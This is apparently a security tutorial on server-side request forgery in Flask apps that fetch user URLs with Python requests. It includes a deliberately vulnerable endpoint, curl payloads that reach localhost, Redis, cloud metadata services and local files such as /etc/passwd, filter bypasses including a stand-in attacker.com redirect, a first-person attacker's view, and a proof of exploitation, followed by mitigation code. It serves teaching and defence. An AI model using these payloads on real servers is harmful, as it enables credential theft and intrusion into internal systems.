Python Requests Library SSRF via URL Parsing
The requests library is the de facto standard for making HTTP requests in Python. It provides a simple and elegant API for interacting with web services, APIs, and remote resources.
When applications use requests to fetch URLs provided by users, they become susceptible to Server-Side Request Forgery (SSRF) attacks. The vulnerability is amplified by URL parsing inconsistencies and the library’s support for various URL schemes.
While requests itself is not inherently vulnerable, improper validation of user-supplied URLs before passing them to requests.get() or similar methods allows attackers to make the server send requests to unintended destinations.
The Vulnerability
Consider an application that fetches and displays content from user-provided URLs:
from flask import Flask, request, jsonify
import requests
app = Flask(__name__)
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
if not url:
return jsonify({"error": "URL parameter required"}), 400
# Vulnerable: no validation of user-supplied URL
try:
response = requests.get(url, timeout=5)
return jsonify({
"status_code": response.status_code,
"content": response.text[:1000]
})
except Exception as e:
return jsonify({"error": str(e)}), 500
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
The application directly passes the user-controlled url parameter to requests.get() without any validation:
response = requests.get(url, timeout=5)
This allows attackers to make the server send requests to arbitrary destinations.
Exploitation
An attacker can target internal services that are not accessible from the internet:
# Access internal services
curl "http://target:5000/fetch?url=http://localhost:8080/admin"
curl "http://target:5000/fetch?url=http://127.0.0.1:6379/" # Redis
curl "http://target:5000/fetch?url=http://192.168.1.1/admin" # Internal network
# Access cloud metadata endpoints
curl "http://target:5000/fetch?url=http://169.254.169.254/latest/meta-data/" # AWS
curl "http://target:5000/fetch?url=http://metadata.google.internal/computeMetadata/v1/" # GCP
The requests library also supports the file:// scheme, which can be used to read local files:
# Read local files via file:// scheme
curl "http://target:5000/fetch?url=file:///etc/passwd"
curl "http://target:5000/fetch?url=file:///proc/self/environ"
URL Parsing Bypass Techniques
Even when basic validation is implemented, attackers can use URL parsing inconsistencies to bypass filters:
# Weak validation that can be bypassed
def is_safe_url(url):
blocked = ['localhost', '127.0.0.1', '169.254.169.254']
return not any(blocked_host in url.lower() for blocked_host in blocked)
Bypass techniques:
# Decimal IP representation
curl "http://target:5000/fetch?url=http://2130706433/" # 127.0.0.1 as decimal
# IPv6 representations
curl "http://target:5000/fetch?url=http://[::1]/" # localhost
curl "http://target:5000/fetch?url=http://[0:0:0:0:0:0:0:1]/"
# URL encoding
curl "http://target:5000/fetch?url=http://%31%32%37%2e%30%2e%30%2e%31/"
# DNS rebinding (attacker-controlled domain resolving to internal IP)
curl "http://target:5000/fetch?url=http://localtest.me/" # Resolves to 127.0.0.1
# Redirect bypass (if following redirects)
curl "http://target:5000/fetch?url=http://attacker.com/redirect?to=http://localhost/"
Vulnerable Patterns with requests Library
# Pattern 1: Direct URL usage
requests.get(user_url)
# Pattern 2: URL construction without validation
base_url = "http://api.internal/"
requests.get(base_url + user_path) # Path traversal possible
# Pattern 3: Following redirects to internal hosts
requests.get(user_url, allow_redirects=True)
# Pattern 4: Using user input in headers
requests.get(url, headers={"Host": user_input}) # Host header injection
Why requests SSRF matters from an offensive security perspective
I prize SSRF through requests because it turns the server into my proxy into everything it can reach and I cannot. From the outside the loopback interface, the RFC1918 ranges, the container’s sidecar, and the cloud metadata service are all invisible to me; once I control the URL, the server fetches them and hands me the bodies. On a cloud host that usually means walking 169.254.169.254 to lift IAM credentials, which is the fastest path from a “harmless” URL fetcher to account compromise. The file:// scheme on top of that gives me local file read from the same primitive.
What makes this class durable is that the bug is in validation, not in requests, so it survives naive filters. The tells I hunt for:
- A user-supplied value passed into
requests.get/post(...). Webhook senders, URL previews, avatar and image fetchers, PDF and screenshot renderers, and “import from URL” features are the usual carriers. - Blocklists of hostname strings rather than resolved-IP checks. Substring matching on
localhostor127.0.0.1is bypassed with decimal IPs, IPv6[::1], URL encoding, and DNS names that resolve inward. allow_redirects=Trueleft at its default. A permitted host that 302s tohttp://169.254.169.254/defeats any check done only on the original URL, so I always probe redirect following.- Validation that resolves DNS once, then fetches separately. That time-of-check gap is DNS rebinding, and I exploit it with a host that answers public on the first lookup and internal on the second.
The defender takeaway: validate after resolution against IP ranges, re-check every redirect hop, and prefer an egress proxy over hostname blocklists. The same primitive is covered from the parsing angle in Server Side Request Forgery (SSRF) in Flask Applications.
Proof of exploitation
Run the lab app (PyFuLabs/flask-fu/flask-requests-ssrf). The url parameter is handed straight to requests.get, so the server fetches whatever the client names, including loopback addresses it should never reach:
curl -sG "http://pyfu.local/flask-fu/flask-requests-ssrf/fetch" \
--data-urlencode "url=http://127.0.0.1:5000/"
{
"content": "<!doctype html>\n<html lang=en>\n<title>404 Not Found</title>\n<h1>Not Found</h1>..."
}
The response body is whatever the internal listener returned, confirming the request originated server-side at 127.0.0.1 rather than from the client.
Mitigation
Implement strict URL validation using allowlists and proper parsing:
from flask import Flask, request, jsonify
from urllib.parse import urlparse
import requests
import ipaddress
import socket
app = Flask(__name__)
ALLOWED_SCHEMES = ['http', 'https']
BLOCKED_HOSTS = ['localhost', '127.0.0.1', '0.0.0.0']
BLOCKED_NETWORKS = [
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('169.254.0.0/16'),
]
def is_safe_url(url: str) -> bool:
try:
parsed = urlparse(url)
# Check scheme
if parsed.scheme not in ALLOWED_SCHEMES:
return False
# Check for blocked hostnames
hostname = parsed.hostname
if not hostname or hostname in BLOCKED_HOSTS:
return False
# Resolve hostname and check IP
ip = socket.gethostbyname(hostname)
ip_obj = ipaddress.ip_address(ip)
for network in BLOCKED_NETWORKS:
if ip_obj in network:
return False
return True
except Exception:
return False
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
if not url or not is_safe_url(url):
return jsonify({"error": "Invalid or blocked URL"}), 400
try:
response = requests.get(url, timeout=5, allow_redirects=False)
return jsonify({
"status_code": response.status_code,
"content": response.text[:1000]
})
except Exception as e:
return jsonify({"error": str(e)}), 500
Key mitigations:
- Validate URL scheme (only allow
httpandhttps) - Resolve hostnames and check against blocked IP ranges
- Disable redirect following or validate redirect targets
- Use allowlists for permitted domains when possible
- Set timeouts to prevent slow-loris style attacks